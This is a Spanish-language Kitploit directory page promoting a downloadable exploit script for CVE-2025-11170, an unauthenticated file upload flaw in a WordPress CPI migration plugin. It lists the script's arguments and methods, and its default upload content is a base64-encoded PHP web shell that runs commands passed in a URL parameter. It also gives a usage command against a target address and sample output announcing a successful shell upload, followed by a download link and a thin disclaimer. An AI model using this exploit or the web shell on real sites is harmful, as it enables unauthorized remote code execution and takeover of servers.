Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nxploited/cve-2025-11170
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-11170

CVE-2025-11170

Plugin de migración de WP para CPI <= 1.0.2 - Subida arbitraria de archivos sin autenticación

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Carga arbitraria de archivos no autenticada

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Carga arbitraria de archivos no autenticada

📝 Descripción

El plugin WP移行専用プラグイン for CPI para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo en la función Cpiwm_Import_Controller::import en todas las versiones hasta la 1.0.2 inclusive.
Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente permite la ejecución remota de código.

🛡️ Detalles de la vulnerabilidad

  • CVE: CVE-2025-11170
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Carga remota de archivos no autenticada

⚡ Información del script

  • Nombre del script:
CVE-2025-11170.py
  • Propósito: Exploit automatizado de carga de shell/archivos para el plugin de migración CPI vulnerable de WordPress.
  • 🔧 Uso

    Argumentos

    ArgumentoDescripción
    -u, --urlURL base del objetivo (p. ej., http://target.com/wordpress/). El script añade wp-admin/admin-ajax.php automáticamente.
    -f, --filenameNombre del shell o archivo a cargar. Por defecto: shell.php
    -d, --dataContenido del archivo en base64 (o texto plano). Por defecto: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
    -i, --indexValor del campo índice. Por defecto: 0
    -H, --headersCabeceras HTTP adicionales (formato: X-Key:Value;K2:Value2)
    -t, --timeoutTiempo de espera para la solicitud HTTP (segundos). Por defecto: 10
    --retriesNúmero de reintentos. Por defecto: 3
    --backoffFactor de retroceso entre reintentos (segundos). Por defecto: 0.7
    -v, --verboseAumenta la verbosidad para depuración (repetible)

    🚦 Métodos explicados

    • Nxploited_parse_args
      Analiza y valida los argumentos de entrada. Asegura la estructura de endpoint correcta, las cabeceras y la codificación de datos.

    • Nxploited_logging
      Configura registro avanzado y verbosidad para una salida detallada o mínima en tiempo de ejecución.

    • Nxploited_retry_session
      Inicializa una sesión persistente con lógica de reintentos y retroceso para comunicaciones resilientes.

    • Nxploited_build_payload
      Construye los parámetros de la solicitud POST para la explotación.

    • Nxploited_send
      Realiza la solicitud POST real al endpoint vulnerable y gestiona respuestas/errores.

    • Nxploited_output_result
      Procesa y formatea la respuesta, mostrando la ruta del shell en caso de éxito, o información de depuración en caso contrario.


    💡 Ejemplo de uso

    root@kitploit:~
    python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
    

    Salida de ejemplo:

    root@kitploit:~
    Uploading shell...
    Processing response...
    [+] Upload successful!
    Shell path:
    http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
    Nxploited
    My GitHub: https://github.com/Nxploited
    

    🚨 Aviso legal

    Este script se proporciona solo con fines educativos.
    El uso de este exploit en objetivos sin la autorización adecuada puede ser ilegal.
    El autor no asume NINGUNA responsabilidad por cualquier uso indebido, daños o consecuencias legales.


    📢 Contáctame

    GitHub: Nxploited
    Telegram: KNxploited


    Por: Nxploited ( Khaled Alenazi )

    Descargar herramienta